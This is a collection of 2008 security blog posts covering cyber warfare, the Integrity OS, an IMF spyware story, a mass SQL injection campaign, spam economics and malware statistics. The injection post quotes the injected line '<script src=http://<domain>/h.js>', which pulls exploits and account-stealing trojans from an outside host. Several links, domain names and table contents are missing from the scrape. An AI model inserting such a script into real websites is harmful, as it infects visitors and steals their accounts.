Use of Cyber Warfare Will Limit U.S Freedom of Action says Intelligence


Not entirely cyber warfare related but still a very interesting read, but according to the Global Trends 2025 report by the National Intelligence Council, irregular warfare, which cyber warfare is part of, will play a determinant part into the future of the United States:

“… expanded adoption of irregular warfare tactics by both state and nonstate actors, proliferation of long-range precision weapons, and growing use of cyber warfare attacks increasingly will constrict US freedom of action.[1]

Unfortunately this is the only mention of cyber warfare in the report, which fails to go into further details. This shouldn’t come to a surprise to anyone though. We all know how reliant on technology everything is nowadays and the interconnection between every part of the modern society. Not only does the United States recognized that cyber warfare will be an important part of the upcoming conflicts, but also does China and Russia, which are stated to become heavyweights on the world stage:

“Few countries are poised to have more impact on the world over the next 15-20 years than China. If current trends persist, by 2025 China will have the world’s second largest economy and will be a leading military power.[2]

Right now, even with her very large armed forces of 2 million active personnel[3], China is trying to modernize its military to be more mobile and efficient. In order to accomplish that modernization, it has explored many new avenues that western societies are still trying to grasp. In 1999, two Chinese Air Forces colonels discussed new ways to conduct war in a guide titled “Unrestricted Warfare”, where they describe the use of computers as new weapons for future warfare:

“With technological developments being in the process of striving to increase the types of weapons, a breakthrough in our thinking can open up the domain of the weapons kingdom at one stroke. As we see it, a single man-made stock-market crash, a single computer virus invasion, or a single rumor or scandal that results in a fluctuation in the enemy country’s exchange rates or exposes the leaders of an enemy country on the Internet, all can be included in the ranks of new-concept weapons.[4]

Experts seem to agree that this kind of “new weapon” could do far more damage than one can imagine:

“If someone is able to attack information that is needed by decision makers, or that is crucial to organizing logistics and supply lines of an army on the ground, that means they can induce chaos in a nation[5] said Sami Saydjari, who worked as a Pentagon cyber expert for 13 years and now runs a private company, Cyber Defence Agency.

. If current trends persist, by 2025 China will have the world’s second largest economy and will be a leading military power
... by 2025 China will have the world’s second largest economy and will be a leading military power

We don’t know how much of the concepts explained in this book as been accepted by the People’s Liberation Army (PLA), but events from the last decade can gave us clues as how much China has developed cyber warfare capacities based on the text of the two colonels. . Concretes realizations of these ideas may have happened as soon as four years after the publication of the guide during Operation Titan Rain in 2003. With a computer network of more than 3.5 million computers spread across 65 countries, the Pentagon faces many challenges against a strong and sophisticated attack and Operation Titan Rain proved this. According to an article on ZDNet[6], 20 hackers, based or using proxies based in China, successfully attacked American networks in a coordinated attack:


  • At 10:23 p.m. PST, the Titan Rain hackers exploited vulnerabilities at the U.S. Army Information Systems Engineering Command at Fort Huachuca, Ariz.

  • At 1:19 a.m., they exploited the same hole in computers at the Defense Information Systems Agency in Arlington, Va.

  • At 3:25 a.m., they hit the Naval Ocean Systems Center, a Defense Department installation in San Diego, Calif.

  • At 4:46 a.m., they struck the U.S. Army Space and Strategic Defense installation in Huntsville, Ala.

The results from this operation were the theft of several classified information:

“From the Redstone Arsenal, home to the Army Aviation and Missile Command, the attackers grabbed specs for the aviation mission-planning system for Army helicopters, as well as Falconview 3.2, the flight-planning software used by the Army and Air Force,” according to Alan Paller, the director of the SANS Institute[7].

Many other attacks have been suspected to originate from China afterwards. Attacks against most of the G7 countries such as France[8], UK and Germany[9], New Zealand[10] and India[11] have been reported by many medias.

Cyber War
Attacks against most of the G7 countries such as France, UK and Germany, New Zealand and India have been reported

Although evidence gathered shows that China is aggressively pursuing irregular warfare, Russia is also gaining a strong cyber warfare reputation on the world scene. Its attack against Estonia has won world coverage and succeeding attacks on Georgia gave the country experience in that domain. It is again unclear though if attacks from Russia are actually coming from government agencies or from criminal behaviour.

The first incident concerning Russia goes back to 1999, before the Chinese cyber attacks. American networks went under siege in what is now called Operation Moonlight Maze. Back then, FBI officials were investigating a breach into the DOD satellite control systems. Again, while the first accusations for the source of this attack were Russian authorities, it was soon shown that they were not implied in this attack[12]. The only certitude about this operation was that the attack went through a Russian proxy.

Nevertheless, Russia cyber warfare was displayed on Estonia in 2007. Once against, it was unclear if the government was involved or if Russian patriotism over the removal of the war memorial[13] caused Russian script kiddies and botnets to answer with a massive DDoS attack. Moscow always denied any involvement in that case. It is also well known that major botnets that are lurking on the net are often controlled by Russian cyber-criminal gangs such as the Russian Business Network. It’s quite possible that those cyber-gangs ordered their botnets to retaliate against Estonia, especially since the attack consisted mostly of a denial-of-service attack, and wasn’t not as sophisticated as a coordinated hacking attack on networks. Another plausible option would be that Russia’s cyber army is a mercenary force.

A repetition of the Estonia cyber attack then took place against Georgia during the Russia-Georgian conflict. The same kind of attack occurred and took down various governmental and commercial websites: HTTP floods were send to and Some other sites were hi-jacked and displayed fake information. The Georgian government had to put up a temporary website on Blogspot. This time, the Russian Business Network was openly suspected by many analysts to be behind the attacks[14].

HTTP floods were send to and
HTTP floods were send to and

McAfee claims that 120 countries around the world are now developing cyber warfare strategies[15]. It is inevitable that countries without cyber warfare capacities will be at great disadvantage in any arising conflict, as disruption of communications will be the first objective of any belligerent. It’s crucial that a strong offensive and defensive cyber war force be developed in order to not only defend against cyber threats, but also wage war in cyberspace.

See also:

“Inside the Chinese Hack Attack”, “Nathan Thornburgh”, Time, August 25, 2005,,8599,1098371,00.html (accessed on November 21, 2008)

“Coordinated Russia vs. Georgia cyber attack in progress”, Dancho Danchev, August 11, 2008, (accessed on November 21, 2008)

[1] “Global Trends 2025: A Transformed World”, National Intelligence, U.S Government, November 2008, p. XI

[2] Ibid. p. 29

[3] The Asian Conventional Military Balance in 2006: Overview of major Asian Powers”, Anthony H. Cordesman, Martin Kleiber, CSIS, June 26, 2006, p.24

[4] Translation from “Unrestricted Warfare”, Qiao Liang, Wang Xiangsui, PLA Literature and Arts Publishing House, February 1999. p. 25

[5] “China flexes muscles of its ‘informationised’ army”, Ed Pilkington, Bobbie Johnson, The Guardian, September 5, 2007, (accessed on November 21, 2008)

[6] “Security experts lift lid on Chinese hack attacks”, “Tom Espiner”, ZDNet, November 23, 2005, (accessed on November 21, 2008)

[7] Ibid.

[8] “French government falls prey to cyber-attacks ‘involving China'”, Agence France-Presse, September 9, 2007, (accessed on November 21, 2008)

[9] “Chinese government at the center of five cyber attack claims”, Jeremy Reimer, September 14, 2007, (accessed on November 21, 2008)

[10] “New Zealand hit by foreign computer hacking”, Agence France-Presse, The Age, September 11, 2007, (accessed on November 21, 2008)

[11] “China mounts cyber attacks on Indian sites”, Indrani Bagchi, The Times of India, May 5, 2008, (accessed on November 21, 2008)

[12] “Russia hacking stories refuted”, Federal Computer Weekly, September 27, 1999, (accessed on November 21, 2008)

[13] “Estonia hit by ‘Moscow cyber war'”, BBC News, May 17, 2007, (accessed on November 21, 2008)

[14] “Georgia: Russia ‘conducting cyber war'”, Jon Swaine, The Telegraph, August 11, 2008, (accessed on November 21, 2008)

[15] “China Disputes Cyber Crime Report”, Jordan Robertson, Washington Post, November 29, 2007, (accessed on November 21, 2008)

Integrity OS to be Released Commercially


The Integrity Operating System, an OS with the highest security rating from the National Security Agency (NSA) and used by the military, will now be sold to the private sector by Integrity Global Security, a subsidiary of Green Hills Software. The commercial operating system will be based on the Integrity 178-B OS, which was used in the 1997 B1B Bomber and afterwards in F-16, F-22 and F-35 military jets. It is also used in the Airbus 380 and Boeing 787 airplanes[1].

The Integrity 178-B OS has been certified EAL6+ (Evaluation Assurance Level 6) by the NSA and is the only OS to have achieve this level of security for now. Most commercial operating systems such as Windows and Linux distributions have an EAL4+ certification. The EAL is a certification which indicates a degree of security of the operation system, level 1 is about applications having been tested but where a security breach would not incurs serious threats. A level 7, the highest level, contains applications strong enough to resist a high risk of threats and can withstand sophisticated attacks. Only one application has a level 7 certification and it is the Tenix Data Diode by Tenix America[2].

The Integrity OS can run by itself or with other operating systems on top, such as Windows, Linux, MacOS, Solaris, VxWorks, Palm OS and even Symbian OS. Each OS being in is own partition to limit the eventual failures and security vulnerabilities to the OS only.



Protection Profile

Security Level


Operating System


EAL 6+


Operating System


EAL 4+

PR/SM LPAR Hypervisor





Operating System

Not evaluated

EAL 4+

Solaris (and Trusted Solaris)

Operating System


EAL 4+


Operating System






EAL 4+

Windows Vista

Operating System

Not evaluated

EAL 4+

Windows XP

Operating System


EAL 4+



Not evaluated

EAL 4+

Main Operating Systems with the type of protection profile used and the assigned EAL[3]

The main feature of the Integrity OS is the use of the Separation Kernel Protection Profile (SKPP). A protection profile (PP) is a document used by the certification process, which describes the security requirements for a particular problem. The SKPP is a standard developed by the NSA and in which the requirements for a high robustness operating system are defined and are based on John Rushby‘s concept of Separation Kernel. This concept can be summarized as:

… a single-processor model of a distributed system in which all user processes are separated in time and space from each other. In a distributed system, the execution of each process takes place in a manner independent of any other[4]

Basically, the concept is about a computer simulating a distributed environment, and each process is independent from the other, thus preventing that a corrupted or breached application gives inavertedly access to restricted resources, as it is often the case in privilege escalation in other commercial OS.

Schema of the Integrity 178B Operating System
Schema of the Integrity 178B Operating System

What makes SKPP standard so secure is that it requires a formal method of verification during the development. Furthermore, the source code is examined by a third party, in this case, the NSA.

SKPP separation mechanisms, when integrated within a high assurance security architecture, are appropriate to support critical security policies for the Department of Defense (DoD), Intelligence Community, the Department of Homeland Security, Federal Aviation Administration, and industrial sectors such as finance and manufacturing.[5]

Of course, the OS might be conceived for security and toughness, but in the end, it all depends on how it is used and configured…That’s going to be the real test. As far as I believe the people who verified the OS are competent, and all the expensive tests the company has paid to check their operating system are rigorous, the real exam would be to release it in the wild so that hackers from all around the world can have a try at it. Hopefully, we might be able to play with this OS someday…

See also:

U.S. Government Protection Profile for Separation Kernels in Environments Requiring High Robustness“, Information Assurance Directorate, June 29, 2007

Formal Refinement for Operating System Kernels, Chapter 4 p. 203-209“, Iain D. Craig, Springer London, Springer Link, July 2007

Separation kernel for a secure real-time operating system“, Rance J. DeLong, Safety Critical Embedded Systems, February 2008, p.22

Controlled Access Protection Profile“, Information Systems Security Organization, National Security Agency, October 8, 1999

[1] “Secure OS Gets Highest NSA Rating, Goes Commercial”, Kelly Jackson Higgins, DarkReading, November 18, 2008, (accessed on November 19, 2008)

[2] “TENIX Interactive Lin k solutions”, TENIX America, (accessed on November 19, 2008)

[3] “The Gold Standard for Operating System Security: SKPP”, David Kleidermacher, Integrity Global Security, 2008, (accessed on November 19, 2008)

[4] “Formal Refinement for Operating System Kernels”, Iain D. Craig, Springer London, Springer Link, July 2007, p. 203

[5] “U.S. Government Protection Profile for Separation Kernels in Environments Requiring High Robustness”, Information Assurance Directorate, June 29, 2007, p.10

International Monetary Fund Infected With Spyware


According to a misleading and pretty much unrelated article, FOX News reports that the International Monetary Fund (IMF) network has been infected by spyware[1]. The IMF denies any security breach or critical intrusion problems.

The article goes on discussing various topics such as the financial crisis, cyber security of the new president-elect and event describe spyware as “software that is secretly installed on a computer to intercept information or take control of the system” which is partially wrong, as spyware don’t necessarily implies control of the computer, and as far as I know, spyware can come bundled with software and doesn’t mean it’s secretly installed. It does, however intercept information, but that could be information about surfing habits. No information is given about the data collected or the type of spyware detected, but always according to FOX, “cyber-hackers” would be the cause…

The report goes on writing about Chinese attempts to develop cyber warfare capacities, which is not related, and do not give any concrete information about the alleged “security breach” at the IMF. FOX News cites a spokesman, Bill Murray, saying precautions had been implemented but didn’t report anything about an “intrusion”:

“There was no lockdown as far as I’m aware” says Murray. “I’m not aware of any major breaches, but enhanced security measures have been taken.”

Therefore, be suspicious about this story, as it seem widely over exaggerated by FOX News . I’m not quite sure the author really knows what he’s talking about…

[1] “Cyber-Hackers Break Into IMF Computer System”, Richard Behar, FOX News, November 14, 2008,,2933,452348,00.html (accessed on November 17, 2008)

New Cyber Attack on the Way


A new SQL Injection tool is being used to conduct a mass cyber attack on various servers across the net. It has already attacked websites such as, and[1]. Websense has observed around 1200 servers from Europe, Asia and the U.S containing the injection.

“Websites being hacked and links placed on them that lead to malicious servers. We’re estimating that in the last two days along, between 2000 and 10,000 servers, mainly Western European and American ones, have been hacked. It’s not yet clear who’s doing this.[2]says an analyst from

The targeted websites are usually running an ASP engine and are hacked by using stolen accounts or using SQL injections. The injection add a javascript line at the end of the page: <script src=http://<domain>/h.js>, where <domain> is a domain redirecting to another server called Kaspersky Lab, which has first reported the attack[3], has identified 6 of those domains:


These servers will retrieve a javascript (h.js) from a Chinese server called, which will try various exploits against the victims. If one is found, it will install a variety of Trojans that will try to download even more downloaders, steal World of Warcraft accounts and other private information. All that is done without the user’s knowledge, and could be done from legitimate websites.

Don Jackson, director of threat intelligence for SecureWorks, is saying that his team is currently in talks with the developers of the tools in order to get a copy and reverse-engineer it. Jackson claims that the attacks looks like the same used by the Asprox botnet, but is less aggressive and stealthier. The tool also uses a digital rights management (DRM) system.

[1] “Relentless Web Attack Hard To Kill”, Kelly Jackson Higgins, DarkReading, November 11, 2008, (accessed on November 12, 2008)

[2] “Big Chinese Hack 2?”,, (accessed on November 13, 2008)

[3] Ibid.

TCP/IP Weapons Course to be Given at Black Hat Europe


For those who can get on location – and can afford it – Richard Bejtlich, from TaoSecurity will give a 2-days course on how to detect and react to an attack on a network. The course will cover those points:

  1. Collection: What data do you need to detect intruders? How can you acquire it? What tools and platforms work, and what doesn’t? Can I build what I need?
  2. Analysis: How do you make sense of data? If intrusion detection systems are dead, what good are they? What is Network Security Monitoring (NSM)? How can I perform network forensics?
  3. Escalation: What do you do when you suspect an intrusion? How can you confirm a compromise? How should you act?
  4. Response: You’re owned — now what? Do you contain, remediate, or play dead? How do intruders react to your actions? Can you ever win?

Black Hat Europe 2009 will occur from April 14 to 17 in Amsterdam and will reunite 20 internationally renowned security specialists worldwide.

Black Hat Europe 2009 will occur from April 14 to 17 in Amsterdam
Black Hat Europe 2009 will occur from April 14 to 17 in Amsterdam

See also:

Black Hat Europe 2008 Briefings, (accessed on November 11, 2008)

How do Spammers Make Money?


A very interesting article on the BBC discussed on how to spammers actually earn money with their system.

Many of us might have asked themselves the question on “why do spammers still sends their e-mails?”, or “how to they make money?” After all, most of computer users know about spam by now. Well it appears that even if spammers gets only one answer for 12.5 million e-mail sent[1], that’s all they need to make the big bucks. That’s what a team from the International Computer Science Institute found out in their paper “Spamalytics: An Empirical Analysis of Spam Marketing Conversion“.

The researchers hijacked a part of the Storm botnet, which used to be one of the biggest botnet around, and rewrote a part of the command and control module of the bot. In order to measure the success of the spam campaign, the team set up two websites, one being a fake Canadian pharmacy and another was postcard website, used to make the user download malware.

Overall, the computer scientists spawn 8 proxies and 75 869 worker bots[2]. They sent 469 million of spam emails, trying to convince the recipients to buy products from the fake online pharmacy. They also made sure to distinguish the visitors on their website by identifying crawlers and honey clients from genuine clients.

From the 350 million spams sent for the pharmacy website, for a period of 26 days, only 28 people went to visit the purchase page of the fake website[3].

Location of the victims that visited the postcard website (white/gray dots) and the 28 victims that went to the purchase page of the pharmacy.

According to the report:

Under the assumption that our measurements are representative over time (an admittedly dangerous assumption when dealing with such small samples), we can extrapolate that, were it sent continuously at the same rate, Storm-generated pharmaceutical spam would produce roughly 3.5 million dollars of revenue in a year. This number could be even higher if spam-advertised pharmacies experience repeat business. A bit less than “millions of dollars every day”, but certainly a healthy enterprise[5].

The report can be found here.

[1] “Study shows how spammers cash in”, BBC News, November 10, 2008, (accessed on November 10, 2008)

[2]Spamalytics: An Empirical Analysis of Spam Marketing Conversion“, Chris Kanich, Christian Kreibich, Kirill Levchenko, Brandon Enright, Geoffrey M. Voelker, Vern Paxson, Stefan Savage, International Computer Science Institute, 2008, p.6

[3] Ibid. p.11

[4] Ibid. p.9

[5] Ibid. p.11

Microsoft: Malware Up 38% in United States in 2008


According to the latest Security Intelligence Report from Microsoft, malicious software installations on computers increased 38% in the U.S for 2008.[1] Also, the number of “High Severity” vulnerabilities detected increased by 13% in the second half of 2007, putting the total of “High Severity” vulnerabilities to 48%.

Downloaders and droppers, accounting for 30% of all malicious software, with around 7 millions computers infected in the United States alone.

And of course, no good Microsoft document would be complete by stating that Vista in more awesome than XP, and therefore the report states that if you own Windows XP SP3, you’re likely to be infected 9 times on 1000 infections, while this number drops to 4 times on 1000 infections for Vista.

“For browser-based attacks on Windows XP-based machines, Microsoft vulnerabilities accounted for 42 percent of the total. On Windows Vista-based machines, however, the proportion of vulnerabilities attacked in Microsoft software was much smaller, accounting for just 6 percent of the total[2].”

Taken from the report:




% Chg.





























Dominican Republic








Saudi Arabia
















Former Yugoslav Republic of Macedonia




























United Arab Emirates












Bosnia and Herzegovina








Table 1.0 – Countries with the Highest Infection Rates[3]

See also:

“Microsoft Security Intelligence Report”, Microsoft, January-June 2008, (accessed on November 4, 2008)

“Les menaces en augmentation de 43%, dit Microsoft”, Marie-Ève Morasse, Cyberpresse, November 3, 2008, (in French) (accessed on November 4, 2008)

[1] “Microsoft Security Intelligence Report”, Microsoft, January-June 2008, p. 122

[2] Ibid. p. 5

[3] Ibid. p.49